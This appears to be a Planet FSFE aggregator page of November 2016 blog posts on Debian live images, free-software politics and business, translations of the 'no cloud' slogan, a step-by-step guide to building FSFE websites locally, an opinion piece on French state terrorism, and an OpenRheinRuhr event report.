Ana and myself worked on live-wrapper, which uses vmdebootstrap internally for the squashfs generation. I worked on improving logging, using a better method for getting paths within the image, enabling generation of Packages and Release files for the image archive and also made the images installable (live-wrapper 0.5 onwards will include an installer by default).

Ana worked on the inclusion of HDT and memtest86+ in the live images and enabled both ISOLINUX (for BIOS boot) and GRUB (for EFI boot) to boot the text-mode and graphical installers.

live-wrapper 0.5 was released on the 16th November with these fixes included. You can find live-wrapper documentation at https://live-wrapper.readthedocs.io/en/latest/. (The documentation still needs some work, some options may be incorrectly described).

Thanks to the sponsors that made this work possible. You’re awesome. (:

Monday, 21 November 2016

21 November 1916

DanielPocock.com - fsfe | 18:31, Monday, 21 November 2016

There has been a lot of news recently about the 100th anniversaries of various events that took place during the Great War.

On 21 November 1916, the SS Hunscraft sailed from Southampton to France. My great grandfather, Robert Pocock, was aboard.

He was part of the Australian Imperial Force, 3rd Divisional Train.

It's sad that Australians had to travel half way around the world to break up fist fights and tank battles. Sadder still that some people who romanticize the mistakes of imperialism are being appointment to significant positions of power.

Fortunately my great grandfather returned to Australia in one piece, many Australians didn't.

Robert Pocock's war medals

Sunday, 20 November 2016

On Not Liking Computers

Paul Boddie's Free Software-related blog » English | 23:57, Sunday, 20 November 2016

Adam Williamson recently wrote about how he no longer really likes computers. This attracted many responses from people who misunderstood him and decided to dispense career advice, including doses of the usual material about “following one’s passion” or “changing one’s direction” (which usually involves becoming some kind of “global nomad”), which do make me wonder how some of these people actually pay their bills. Do they have a wealthy spouse or wealthy parents or “an inheritance”, or do they just do lucrative contracting for random entities whose nature or identities remain deliberately obscure to avoid thinking about where the money for those jobs really comes from? Particularly the latter would be the “global nomad” way, as far as I can tell.

But anyway, Adam appears to like his job: it’s just that he isn’t interested in technological pursuits outside working hours. At some level, I think we can all sympathise with that. For those of us who have similarly pessimistic views about computing, it’s worth presenting a list of reasons why we might not be so enthusiastic about technology any more, particularly for those of us who also care about the ethical dimensions, not merely whether the technology itself is “any good” or whether it provides a sufficient intellectual challenge. By the way, this is my own list: I don’t know Adam from, well, Adam!

Lack of Actual Progress

One may be getting older and noticing that the same technological problems keep occurring again and again, never getting resolved, while seeing people with no sense of history provoke change for change’s – not progress’s – sake. After a while, or when one gets to a certain age, one expects technology to just work and that people might have figured out how to get things to communicate with each other, or whatever, by building on what went before. But then it usually seems to be the case that some boy genius or other wanted a clear run at solving such problems from scratch, developing lots of flashy features but not the mundane reliability that everybody really wanted.

People then get told that such “advanced” technology is necessarily complicated. Whereas once upon a time, you could pick up a telephone, dial a number, have someone answer, and conduct a half-decent conversation, now you have to make sure that the equipment is all connected up properly, that all the configurations are correct, that the Internet provider isn’t short-changing you or trying to suppress your network traffic. And then you might dial and not get through, or you might have the call mysteriously cut out, or the audio quality might be like interviewing a gang of squabbling squirrels speaking from the bottom of a dustbin/trashcan.

Depreciating Qualifications

One may be seeing a profession that requires a fair amount of educational investment – which, thanks to inept/corrupt politicians, also means a fair amount of financial investment – become devalued to the point that its practitioners are regarded as interchangeable commodities who can be coerced into working for as little as possible. So much for the “knowledge economy” when its practitioners risk ending up earning less than people doing so-called “menial” work who didn’t need to go through a thorough higher education or keep up an ongoing process of self-improvement to remain “relevant”. (Not that there’s anything wrong with “menial” work: without people doing unfashionable jobs, everything would grind to a halt very quickly, whereas quite a few things I’ve done might as well not exist, so little difference they made to anything.)

Now we get told that programming really will be the domain of “artificial intelligence” this time around. That instead of humans writing code, “high priests” will merely direct computers to write the software they need. Of course, such stuff sounds great in Wired magazine and rather amusing to anyone with any actual experience of software projects. Unfortunately, politicians (and other “thought leaders”) read such things one day and then slash away at budgets the next. And in a decade’s time, we’ll be suffering the same “debate” about a lack of “engineering talent” with the same “insights” from the usual gaggle of patent lobbyists and vested interests.

Neoliberal Fantasy Economics

One may have encountered the “internship” culture where as many people as possible try to get programmers and others in the industry to work for nothing, making them feel as if they need to do so in order to prove their worth for a hypothetical employment position or to demonstrate that they are truly committed to some corporate-aligned goal. One reads or hears people advocating involvement in “open source” not to uphold the four freedoms (to use, share, modify and distribute software), but instead to persuade others to “get on the radar” of an employer whose code has been licensed as Free Software (or something pretending to be so) largely to get people to work for them for free.

Now, I do like the idea of employers getting to know potential employees by interacting in a Free Software project, but it should really only occur when the potential employee is already doing something they want to do because it interests them and is in their interests. And no-one should be persuaded into doing work for free on the vague understanding that they might get hired for doing so.

The Expendable Volunteers

One may have seen the exploitation of volunteer effort where people are made to feel that they should “step up” for the benefit of something they believe in, often requiring volunteers to sacrifice their own time and money to do such free work, and often seeing those volunteers being encouraged to give money directly to the cause, as if all their other efforts were not substantial contributions in themselves. While striving to make a difference around the edges of their own lives, volunteers are often working in opposition to well-resourced organisations whose employees have the luxury of countering such volunteer efforts on a full-time basis and with a nice salary. Those people can go home in the evenings and at weekends and tune it all out if they want to.

No wonder volunteers burn out or decide that they just don’t have time or aren’t sufficiently motivated any more. The sad thing is that some organisations ignore this phenomenon because there are plenty of new volunteers wanting to “get active” and “be visible”, perhaps as a way of marketing themselves. Then again, some communities are content to alienate existing users if they can instead attract the mythical “10x” influx of new users to take their place, so we shouldn’t really be surprised, I suppose.

Blame the Powerless

One may be exposed to the culture that if you care about injustices or wrongs then bad or unfortunate situations are your responsibility even if you had nothing to do with their creation. This culture pervades society and allows the powerful to do what they like, to then make everyone else feel bad about the consequences, and to virtually force people to just accept the results if they don’t have the energy at the end of a busy day to do the legwork of bringing people to account.

So, those of us with any kind of conscience at all might already be supporting people trying to do the right thing like helping others, holding people to account, protecting the vulnerable, and so on. But at the same time, we aren’t short of people – particularly in the media and in politics – telling us how bad things are, with an air of expectation that we might take responsibility for something supposedly done on our behalf that has had grave consequences. (The invasion and bombing of foreign lands is one depressingly recurring example.) Sadly, the feeling of powerlessness many people have, as the powerful go round doing what they like regardless, is exploited by the usual cynical “divide and rule” tactics of other powerful people who merely see the opportunities in the misuse of power and the misery it causes. And so, selfishness and tribalism proliferate, demotivating anyone wanting the world to become a better place.

Reversal of Liberties

One may have had the realisation that technology is no longer merely about creating opportunities or making things easier, but is increasingly about controlling and monitoring people and making things complicated and difficult. That sustainability is sacrificed so that companies can cultivate recurring and rich profit opportunities by making people dependent on obsolete products that must be replaced regularly. And that technology exacerbates societal ills rather than helping to eradicate them.

We have the modern Web whose average site wants to “dial out” to a cast of recurring players – tracking sites, content distribution networks (providing advertising more often than not), font resources, image resources, script resources – all of which contribute to making the “signal-to-noise” ratio of the delivered content smaller and smaller all the time. Where everything has to maintain a channel of communication to random servers to constantly update them about what the user is doing, where they spent most of their time, what they looked at and what they clicked on. All of this requiring hundreds of megabytes of program code and data, burning up CPU time, wasting energy, making computers slow and steadily obsolete, forcing people to throw things away and to buy more things to throw away soon enough.

We have the “app” ecosystem experience, with restrictions on access, competition and interoperability, with arbitrarily-curated content: the walled gardens that the likes of Apple and Microsoft failed to impose on everybody at the dawn of the “consumer Internet” but do so now under the pretences of convenience and safety. We have social networking empires that serve fake news to each person’s little echo chamber, whipping up bubbles of hate and distracting people from what is really going on in the world and what should really matter. We have “cloud” services that often offer mediocre user experiences but which offer access from “any device”, with users opting in to both the convenience of being able to get their messages or files from their phone and the surveillance built into such services for commercial and governmental exploitation.

We have planned obsolescence designed into software and hardware, with customers obliged to buy new products to keep doing the things they want to do with those products and to keep it a relatively secure experience. And we have dodgy batteries sealed into devices, with the obligation apparently falling on the customers themselves to look after their own safety and – when the product fails – the impact of that product on the environment. By burdening the hapless user of technology with so many caveats that their life becomes dominated by them, those things become a form of tyranny, too.

Finding Meaning

Many people need to find meaning in their work and to feel that their work aligns with their own priorities. Some people might be able to do work that is unchallenging or uninteresting and then pursue their interests and goals in their own time, but this may be discouraging and demotivating over the longer term. When people’s work is not orthogonal to their own beliefs and interests but instead actively undermines them, the result is counterproductive and even damaging to those beliefs and interests and to others who share them.

For example, developing proprietary software or services in a full-time job, although potentially intellectually challenging, is likely to undermine any realistic level of commitment in one’s own free time to Free Software that does the same thing. Some people may prioritise a stimulating job over the things they believe in, feeling that their work still benefits others in a different way. Others may feel that they are betraying Free Software users by making people reliant on proprietary software and causing interoperability problems when those proprietary software users start assuming that everything should revolve around them, their tools, their data, and their expectations.

Although Adam wasn’t framing this shift in perspectives in terms of his job or career, it might have an impact on some people in that regard. I sometimes think of the interactions between my personal priorities and my career. Indeed, the way that Adam can seemingly stash his technological pursuits within the confines of his day job, while leaving the rest of his time for other things, was some kind of vision that I once had for studying and practising computer science. I think he is rather lucky in that his employer’s interests and his own are aligned sufficiently for him to be able to consider his workplace a venue for furthering those interests, doing so sufficiently to not need to try and make up the difference at home.

We live in an era of computational abundance and yet so much of that abundance is applied ineffectively and inappropriately. I wish I had a concise solution to the complicated equation involving technology and its effects on our quality of life, if not for the application of technology in society in general, then at least for individuals, and not least for myself. Maybe a future article needs to consider what we should expect from technology, as its application spreads ever wider, such that the technology we use and experience upholds our rights and expectations as human beings instead of undermining and marginalising them.

It’s not hard to see how even those who were once enthusiastic about computers can end up resenting them and disliking what they have become.

Friday, 18 November 2016

Localizing our noCloud slogan

English Planet – Dreierlei | 15:12, Friday, 18 November 2016

there is noCloud

At FSFE we have been asked many times to come up with translations of our popular “There is no CLOUD, just other’s peoples computers” slogan. This week we started the localization by asking our translator team and have been very surprised to see they already come up with translations in 16 different languages.

In addition, our current trainee Olga Gkotsopoulou and asked her international network and we asked on twitter for additional translations. And, what can I say? crowdsourcing seldom felt so appealing. In two hours we got 8 more translations and after 24 hours we already had 30 translations.

The quickness in that we got so many translations shows us that the slogan is indeed at the pulse of time. People are happy to translate it because they love to send this message out. At the time of writing we now have 36 translations and two dialects on our wiki-page:

[AR] لا يوجد غيم, هناك أخرين كمبيوتر
[BR] N’eus Cloud ebet. Urzhiataerioù tud all nemetken.
[CAT] No hi ha cap núvol, només ordinadors d’altres persones.
[DA] Der findes ingen sky, kun andre menneskers computere.
[DE] Es gibt keine Cloud, nur die Computer anderer Leute.
[EL] Δεν υπάρχει Cloud, μόνο υπολογιστές άλλων.
[EU] Ez dago lainorik, beste pertsona batzuen ordenagailuak baino ez.
[EO] Nubon ne ekzistas sed fremdaj komputiloj.
[ES] La nube no existe, son ordenadores de otras personas.
[ET] Pole mingit pilve, on vaid teiste inimeste arvutid.
[FA] فضای ابری در کار نیست، تنها رایانه های دیگران
[FR] Il n’y a pas de cloud, juste l’ordinateur d’un autre.
[FI] Ei ole pilveä, vain toisten ihmisten tietokoneita.
[GL] A nube non existe, só son ordenadores doutras persoas.
[GA] Níl aon néal ann, níl ann ach ríomhairí daoine eile.
[HE] אין ענן, רק מחשבים של אנשים אחרים
[HY] Չկա ամպ, կա պարզապես այլ մարդկանց համակարգիչներ
[IT] Il cloud non esiste, sono solo i computer di qualcun altro
[JP] クラウドはありません。 他の人のコンピュータだけがあります。
[KA] არ არის საწყობი ,მხოლოდ ბევრი ეტიკეტებია ხალხში სხვადასხვა ენებზე
[KL] Una pujoqanngilaq – qarasaasiat allat kisimik
[KO] 구름은 없다. 다른 사람의 컴퓨터일뿐.
[LB] Et gëtt keng Cloud, just anere Leit hier Computeren.
[NL] De cloud bestaat niet, alleen computers van anderen
[TR] Bulut diye bir şey yok, sadece başkalarının bilgisayarları var.
[TL] walang ulap kundi mga kompyuter ng ibang tao
[PL] Nie ma chmury, są tylko komputery innych.
[PT] Não há nuvem nenhuma, há apenas computadores de outras pessoas.
[RO] Nu există nici un nor, doar calculatoarele altor oameni.
[RS] Ne postoji Cloud, već samo računari drugih ljudi.
[RU] Облака нет, есть чужие компьютеры.
[SQ] S’ka cloud, thjesht kompjutera personash të tjerë.
[SV] Det finns inget moln, bara andra människors datorer.
[UR] کلاوڈ سرور کچھ نہیی، بس کسی اور کاکمپیوٹر۔
[VI] Không có Đám mây, chỉ có những chiếc máy tính của kẻ khác.
[ZH] 没有云,只有人们的电脑.

And again: If you miss your language or dialect, add it to the wiki, leave it as a comment or write me a message and I will add it.

Tuesday, 15 November 2016

There is no Free Software company - But!

Matthias Kirschner's Web log - fsfe | 09:22, Tuesday, 15 November 2016

Since the start of the FSFE 15 years ago, the people involved were certain that companies are a crucial part to reach our goal of software freedom. For many years we have explained to companies – IT as well as non-IT – what benefits they have from Free Software. We encourage individuals and companies to pay for Free Software, as much as we encourage companies to use Free Software in their offers.

A factory building

While more people demanded Free Software, we also saw more companies claiming something is Free Software or Open Source Software although it is not. This behaviour – also called "openwashing" is nothing special for Free Software, some companies also claim something is "organic" or "fair-trade" although it is not. As the attempts to get a trademark for "Open Source" failed, it is difficult to legally prevent companies from calling something "Free Software" or "Open Source Software" although it does neither comply with the Free Software definition by the Free Software Foundation nor with the Open Source definition by the Open Source Initiative.

When the FSFE was founded in 2001 there was already the idea to encourage and support companies making money with Free Software by starting a "GNU business network". One of the stumbling blocks for that was always the definition of a Free Software company. It cannot just be the usage of Free Software or the contribution to Free Software, but also needs to include what rights they are offering their customers. Another factor was whether the revenue stream is tied to proprietary licensing conditions. Would we also allow a small revenue from proprietary software, and how high is that that you can still consider it a Free Software company?

It turned out to be a very complicated issue, and although we were regularly discussing it we did not have an idea how to approach the problems in defining a Free Software company.

During our last meeting of the FSFE's General Assembly – triggered by our new member Mirko Böhm – we came to the conclusion that there was a flaw in our thinking and that it does not make sense to think about "Free Software companies". In hindsight it might look obvious, but for me the discussion was an eye opener, and I have the feeling that was a huge step for software freedom.

As a side note: When we have the official general assembly of the FSFE we always use this opportunity to have more discussions during the days before or after. Sometimes they focus on internal topics, organisational changes, but often there is brainstorming about the "hot topics of software freedom" and where the FSFE has to engage in the long run. At this year's meeting, from 7 to 9 October, inspired by Georg Greve's and Nicolas Dietrich's input, we spent the whole Saturday thinking about the long term challenges for software freedom with the focus on the private sector.

We talked about the challenges of software freedom presented by economies of scale, networking effects, investment preference, and users making convenience and price based decisions over values – even when they declare themselves value conscious.

One problem preventing a wider spread of software freedom identified there was that Free Software is being undermined by companies that abuse the positive brand recognition of Free Software / Open Source by "openwashing" themselves. Sometimes they offer products that do not even have a Free Software version. This penalises companies and groups that aim to work within the principles of Free Software and damages the recognition of Free Software / Open Source in the market. The consequence is reduced confidence in Free Software, fewer developers working on it, fewer companies providing it, and less Free Software being written in favour of proprietary models.

In the discussion, one question kept arising. Is an activity that is good for Free Software which is done by one small company as their sole activity more valuable than if the same thing were done as part of a larger enterprise? We all agree that a small company which is using and distributing exclusively Free Software, and has done so for many years, and no part of the software they wrote or included was ever non-free software is good. But what happens if said small, focused company got purchased by a larger entity? Does that invalidate the benefit of what is being done?

We concluded that good action remains good action, and that the FSFE should encourage good actions. So instead of focusing on the company as such we should focus on the activity itself; we should think about "Free Software business activities", "Free Software business offers", and such. My feeling was that this was the moment the penny had dropped, while others and me realised the flaw in our previous thinking. We need action oriented approaches and we need to look at activities individually.

There was still the question where to draw the line between acceptable or useful activities and harmful ones. This is not a black and white issue, and when assessing the impact for software freedom there are different levels. For example if you evaluate a sharing platform, you might find out that the core is Free Software, but the sharing module itself is proprietary. This is a bad offer if you want to run a competing sharing platform using Free Software.

The counter example of an acceptable offer was a collaboration software that was useful and complete, but where connecting a proprietary client would itself require a proprietary connector. It was also discussed that sometimes you need to interface with proprietary systems through proprietary libraries that do not allow connecting with Free Software unless one were to first replace the entire API/library itself.

Ultimately a consensus emerged around a focus on the four freedoms of Free Software in relation to the question of whether the software is sufficiently complete and useful to run a competing business.

One thought was to run "test cases" to evaluate how good an offer is on the Free Software scale. Something like a regular bulletin about best and worst practice. We could look at a business activities and study it according to the criteria below, evaluate it, making that evaluation and its conclusions public. That way we can help to build customer awareness about software freedom. Here is a first idea for a scale:

  • EXCELLENT: Free Software only and on all levels, no exceptions.

  • GOOD: Free Software as a complete, useful, and fully supportable product. Support available for Free Software version.

  • ACCEPTABLE: Proprietary interfaces to proprietary systems and applications, especially complex systems that require complex APIs/libraries/SDKs, as long as the above is still met.

  • BAD: Essential / important functionality only available proprietary, critical functionality missing from Free Software (one example for an essential functionality was LDAP connector).

  • REALLY BAD: Fully proprietary, but claiming to be Free Software / Open Source Software.

Now I would like to know from you: what is your first reaction on this? Would you like to add something? Do you have ideas what should be included in a checklist for such a test? Would you be interested to help us to evaluate how good some offers are on such a scale?

To summarise, I believe it was a mistake to think about businesses as a whole before and that if we want to take the next big steps we should think about Free Software business offers / activities – at least until we have a better name for what I described above. We should help companies that they are not deluded by people just claiming something is Free Software, but give them the tools to check themselves.

PS: Thank you very much to the participants at the FSFE meeting, especially Georg Greve for pushing this topic and internally summarising our discussion, and Mirko Böhm who's contribution was the trigger in the discussion for realising our previous flaw in thinking.

Sunday, 13 November 2016

Build FSFE websites locally

English – Max's weblog | 23:00, Sunday, 13 November 2016

Note: This guide is also available in FSFE’s wiki now, and it will be the only version maintained. So please head over to the wiki if you’re planning to follow this guide.

Those who create, edit, and translate FSFE websites already know that the source files are XHTML files which are build with a XSLT processor, including a lot of custom stuff. One of the huge advantages from that is that we don’t have to rely on dynamic website processors and databases, on the other hand there are a few drawbacks as well: websites need a few minutes to be generated by the central build system, and it’s quite easy to mess up with the XML syntax. Now if an editor wants to create or edit a page, she needs to wait a few minutes until the build system has finished everytime she wants to test how the website looks like. So in this guide I will show how to build single websites on your own computer in a fraction of the FSFE’s system build time, so you’ll only need to commit your changes as soon as the file looks as you want it. All you need is a bit hard disk space and around one hour time to set up everything.

The whole idea is based on what FSFE’s webmaster Paul Hänsch has coded and written. On his blog he explains the new build script. He explains how to build files locally, too. However, this guide aims to make it a bit easier and more verbose.

Before we’re getting started, let me shortly explain the concept of what we’ll be doing. Basically, we’ll have three directories: trunk, status, and fsfe.org. Most likely you already have trunk, it’s a clone of the FSFE’s main SVN repository, and the source of all operations. All those files in there have to be compiled to generate the final HTML files we can browse. The location of these finished files will be fsfe.org. status, the third directory, contains error messages and temporary files.

After we (1) created these directories, partly by downloading a repository with some useful scripts and configuration files, we’ll (2) build the whole FSFE website on our own computer. In the next step, we’ll (3) set up a local webserver so you can actually browse these files. And lastly we’ll (4) set up a small script which you can use to quickly build single XHTML files. Last but not least I’ll give some real-world examples.

1. Clone helper repository

Firstly, clone a git repository which will give you most needed files and directories for the further operations. It has been created by me and contains configuration files and the script that will make building of single files easier. Of course, you can also do everything manually.

In general, this is the directory structure I propose. In the following I’ll stick to this scheme. Please adapt all changes if your folder tree looks differently.

trunk (~700 MB):      ~/subversion/fsfe/fsfe-web/trunk/
status (~150 MB):     ~/subversion/fsfe/local-build/status/
fsfe.org (~1000 MB):  ~/subversion/fsfe/local-build/fsfe.org/

(For those not so familiar with the GNU/Linux terminal: ~ is the short version of your home directory, so for example /home/user. ~/subversion is the same as /home/USER/subversion, given that your username is USER)

To continue, you have to have git installed on your computer (sudo apt-get install git). Then, please execute via terminal following command. It will copy the files from my git repository to your computer and already contains the folders status and fsfe.org.

git clone https://src.mehl.mx/mxmehl/fsfe-local-build.git ~/subversion/fsfe/local-build

Now we take care of trunk. In case you already have a copy of trunk on your computer, you can use this location, but please do a svn up beforehand and be sure that the output of svn status is empty (so no new or modified files on your side). If you don’t have trunk yet, download the repository to the proposed location:

svn --username $YourFSFEUsername co https://svn.fsfe.org/fsfe-web/trunk ~/subversion/fsfe/fsfe-web/trunk

2. Build full website

Now we have to build the whole FSFE website locally. This will take a longer time but we’ll only have to do it once. Later, you’ll just build single files and not >14000 as we do now.

But first, we have to install a few applications which are needed by the build script (Warning: it’s possible your system lacks some other required applications which were already installed on mine. If you encounter any command not found errors, please report them in the comments or by mail). So let’s install them via the terminal:

sudo apt-get install make libxslt

Note: libxslt may have a different name in your distribution, e.g. libxslt1.1 or libxslt2.

Now we can start building.The full website build can be started with

~/subversion/fsfe/fsfe-web/trunk/build/build_main.sh --statusdir ~/subversion/fsfe/local-build/status/ build_into ~/subversion/fsfe/local-build/fsfe.org/

See? We use the build routine from trunk to launch building trunk. All status messages are written to status, and the final website will reside in fsfe.org. Mind differing directory names if you have another structure than I do. This process will take a long time, depending on your CPU power. Don’t be afraid of strange messages and massive walls of text ;-)

After the long process has finished, navigate to the trunk directory and execute svn status. You may see a few files which are new:

max@bistromath ~/s/f/f/trunk> svn status
?       about/printable/archive/printable.en.xml
?       d_day.en.xml
?       d_month.en.xml
?       d_year.en.xml
?       localmenuinfo.en.xml
[...]

These are leftover from the full website build. Because trunk is supposed to be your productive source directory where you also make commits to the FSFE SVN, let’s delete these files. You won’t need them anymore.

rm about/printable/archive/printable.en.xml d_day.en.xml d_month.en.xml d_year.en.xml localmenuinfo.en.xml
rm tools/tagmaps/*.map

Afterwards, the output of svn status should be empty again. It is? Fine, let’s go on! If not, please also remove those files (and tell me which files were missing).

3. Set up local webserver

After the full build is completed, you can install a local webserver. This is necessary to actually display the locally built files in your browser. In this example, I assume you don’t already have a webserver installed, and that you’re using a Debian-based operating system. So let’s install lighttpd which is a thin and fast webserver, plus gamin which lighttpd needs in some setups:

sudo apt-get install lighttpd gamin

To make Lighttpd running properly we need a configuration file. This has to point the webserver to show files in the fsfe.org directory. You already downloaded my recommended config file (lighttpd-fsfe.conf.sample) by cloning the git repository. But you’ll have to modify the path accordingly and rename it. So rename the file to lighttpd-fsfe.conf, open it and change following line to match the actual and absolute path of the fsfe.org directory (~ does not work here):

server.document-root = "/home/USER/subversion/fsfe/local-build/fsfe.org"

Now you can test whether the webserver is correctly configured. To start a temporary webserver process, execute the next command in the terminal:

lighttpd -Df ~/subversion/fsfe/local-build/lighttpd-fsfe.conf

Until you press Ctrl+C, you should be able to open your local FSFE website in any browser using the URL http://localhost:5080. For example, open the URL http://localhost:5080/contribute/contribute.en.html in your browser. You should see basically the same website as the original fsfe.org website. If not, double-check the paths, if the lighttpd process is still running, or if the full website build is already finished.

4. Single page build script

Until now, you didn’t see much more than you can see on the original website. But in this step, we’ll configure and start using a Bash script (fsfe-preview.sh) I’ve written to make a preview of a locally edited XHTML file as comfortable as possible. You already downloaded it by cloning the repository.

First, rename and edit the script’s configuration file config.cfg.sample. Rename it to config.cfg and open it. The file contains all paths we already used here, so please adapt them to your structure if necessary. Normally, it should be sufficient to modify the values for LOC_trunk (trunk directory) and LOC_out (fsfe.org directory), the rest can be left with the default values.

Another feature of the fsfe-preview is to automatically check the XML syntax of the files. For this, libxml2-utils has to be installed which contains xmllint. Please execute:

sudo apt-get install libxml2-utils

Now let’s make the script easy to access via the terminal for future usage. For this, we’ll create a short link to the script from one of the binary path directories. Type in the terminal:

sudo ln -s ~/subversion/fsfe/local-build/fsfe-preview.sh /usr/bin/fsfe-preview

From this moment on, you should be able to call fsfe-preview from anywhere in your terminal. Let’s make a test run. Modify the XHTML source file contribute/contribute.en.xhtml and edit some obvious text or alter the title. Now do:

fsfe-preview ~/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml

As output, you should see something like:

[INFO] Using file /home/max/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml as source...
[INFO] XHTML file detected. Going to build into /home/max/subversion/fsfe/local-build/fsfe.org/contribute/contribute.en.html ...
[INFO] Starting webserver

[SUCCESS] Finished. File can be viewed at http://localhost:5080/contribute/contribute.en.html

Now open the mentioned URL http://localhost:5080/contribute/contribute.en.html and take a look whether your changes had an effect.

Recommended workflows

In this section I’ll present a few of the cases you might face and how to solve them with the script. I presume you have your terminal opened in the trunk directory.

Preview a single file

To preview a single file before uploading it, just edit it locally. The file has to be located in the trunk directory, so I suggest to only use one SVN trunk on your computer. It makes almost no sense to store your edited files in different folders. To preview it, just give the path to the edited file as argument for fsfe-preview, just as we did in the preceding step:

fsfe-preview activities/radiodirective/statement.en.xhtml

The script detects whether the file has to be built with the XSLT processor (.xhtml files), or if it just can be copied to the website without any modification (e.g. images).

Copy many files at once

Beware that all files you added in your session have to be processed with the script. For example, if you create a report with many images included and want to preview it, you will have to copy all these images to the output directory as well, and not only the XHTML file. For this, there is the –copy argument. This circumvents the whole XSLT build process and just plainly copies the given files (or folders). In this example, the workflow could look like the following: The first line copies some images, the second builds the corresponding XHTML file which makes use of these images:

fsfe-preview --copy news/2016/graphics/report1.png news/2016/graphics/report2.jpg
fsfe-preview news/2016/news-20161231-01.en.xhtml

Syntax check

In general, it’s good to check the XHTML syntax before editing and commiting files to the SVN. The script fsfe-preview already contains these checks but it’s good to be able to use it anyway. If you didn’t already do it before, install libxml2-utils on your computer. It contains xmllint, a syntax checker for XML files. You can use it like this:

xmllint --noout work.en.xhtml

If there’s no output (–noout), the file has a correct syntax and you’re ready to continue. But you may also see something like

work.en.xhtml:55: parser error : Opening and ending tag mismatch: p line 41 and li
      </li>
           ^

In this case, this means that the <p> tag starting in line 41 isn’t closed properly.

Drawbacks

The presented process and script has a few drawbacks. For example you aren’t able to preview certain very dynamic pages or parts of pages, or those depending on CGI scripts. In most cases you’ll never encounter these, but if you’re getting active with the FSFE’s webmaster team it may happen that you’ll have to fall back on the standard central build system.

Any other issues? Feel free to report them as they will help to improve FSFE’s editors to work more efficiently :-)

Changelog

29 November 2016: Jonas has pointed out a few bugs and issues with a different GNU/Linux distribution. Should be resolved.

Are all victims of French terrorism equal?

DanielPocock.com - fsfe | 10:50, Sunday, 13 November 2016

Some personal observations about the terrorist atrocities around the world based on evidence from Wikipedia and other sources

The year 2015 saw a series of distressing terrorist attacks in France. 2015 was also the 30th anniversary of the French Government's bombing of a civilian ship at port in New Zealand, murdering a photographer who was on board at the time. This horrendous crime has been chronicled in various movies including The Rainbow Warrior Conspiracy (1989) and The Rainbow Warrior (1993).

The Paris attacks are a source of great anxiety for the people of France but they are also an attack on Europe and all civilized humanity as well. Rather than using them to channel more anger towards Muslims and Arabs with another extended (yet ineffective) state of emergency, isn't it about time that France moved on from the evils of its colonial past and "drains the swamp" where unrepentant villains are thriving in its security services?

François Hollande and Ségolène Royal. Royal's brother Gérard Royal allegedly planted the bomb in the terrorist mission to New Zealand. It is ironic that Royal is now Minister for Ecology while her brother sank the Greenpeace flagship. If François and Ségolène had married (they have four children together), would Gérard be the president's brother-in-law or terrorist-in-law?

The question has to be asked: if it looks like terrorism, if it smells like terrorism, if the victim of that French Government attrocity is as dead as the victims of Islamic militants littered across the floor of the Bataclan, shouldn't it also be considered an act of terrorism?

If it was not an act of terrorism, then what is it that makes it differ? Why do French officials refer to it as nothing more than "a serious error", the term used by Prime Minister Manuel Valls during a recent visit to New Zealand in 2016? Was it that the French officials felt it was necessary for Liberté, égalité, fraternité? Or is it just a limitation of the English language that we only have one word for terrorism, while French officials have a different word for such acts carried out by those who serve their flag?

If the French government are sincere in their apology, why have they avoided releasing key facts about the atrocity, like who thought up this plot and who gave the orders? Did the soldiers involved volunteer for a mission with the code name Opération Satanique, or did any other members of their unit quit rather than have such a horrendous crime on their conscience? What does that say about the people who carried out the orders?

If somebody apprehended one of these rogue employees of the French Government today, would they be rewarded with France's highest honour, like those tourists who recently apprehended an Islamic terrorist on a high-speed train?

If terrorism is such an absolute evil, why was it so easy for the officials involved to progress with their careers? Would an ex-member of an Islamic terrorist group be able to subsequently obtain US residence and employment as easily as the French terror squad's commander Louis-Pierre Dillais?

When you consider the comments made by Donald Trump recently, the threats of violence and physical aggression against just about anybody he doesn't agree with, is this the type of diplomacy that the US will practice under his rule commencing in 2017? Are people like this motivated by a genuine concern for peace and security, or are these simply criminal acts of vengence backed by political leaders with the maturity of schoolyard bullies?

Wednesday, 09 November 2016

OpenRheinRuhr 2016 – A report of iron and freedom

English – Max's weblog | 21:55, Wednesday, 09 November 2016

orr2016_iron

Our Dutch iron fighters

Last weekend, I visited Oberhausen to participate in OpenRheinRuhr, a well-known Free Software event in north-western Germany. Over two days I was part of FSFE’s booth team, gave a talk, and enjoyed talking to tons of like-minded people about politics, technology and other stuff. In the next few minutes you will learn what coat hangers have to do with flat irons and which hotel you shouldn’t book if you plan to visit Oberhausen.

On Friday, Matthias, Erik, and I arrived at the event location which normally is a museum collecting memories of heavy industries in the Ruhr area: old machines, the history and background of industry workers, and pictures of people fighting for their rights. Because we arrived a bit too early we helped the (fantastic!) orga team with some remaining work in the exhibition hall before setting up FSFE’s booth. While doing so, we already sold the first tshirt and baby romper (is this a new record?) and had nice talks. Afterwards we enjoyed a free evening and prepared for the next busy day.

But Matthias and I faced a bad suprised: our hotel rooms were build for midgets and lacked a few basic features. For example, Matthias‘ room had no heating, and in my bathroom someone has stolen the shelf. At least I’ve been given a bedside lamp – except the little fact that the architect forgot to install a socket nearby. Another (semi-)funny bug were the emergency exits in front of our doors: by escaping from dangers inside the hotel, taking these exits won’t rescue you but instead increase the probability of dying from severe bone fractures. So if you ever need a hotel in Oberhausen, try to avoid City Lounge Hotel by any means. Pictures at the end of this article.

orr2016_hall1

The large catering and museum hall

On Saturday, André Ockers (NL translation coordinator), Maurice Verhessen (Coordinator Netherlands) and Niko Rikken from the Netherlands joined us to help at the booth and connect with people. Amusingly we again learnt that communication can be very confusing the shorter it is. While Matthias thought that he asked Maurice to bring a iron cloth hanger, Maurice thought he should bring a flat iron. Because he only had one (surprisingly), he asked Niko to bring his as well. While we wondered why Maurice only has one cloth hanger, our Dutch friends wondered why we would need two flat irons ;-)

Over the day, Matthias, Erik, and I gave our talks: Matthias spoke about common misconceptions about Free Software and how to clear them up, Erik explained how people can synchronise their computers and mobile phones with Free Software applications, and I motivated people to become politically active by presenting some lessons learned from my experiences with the Compulsory Routers and Radio Lockdown cases. There were many other talks by FSFE people, for example by Wolf-Dieter and Wolfgang. In the evening we enjoyed the social event with barbecue, free beer, and loooooong waiting queues.

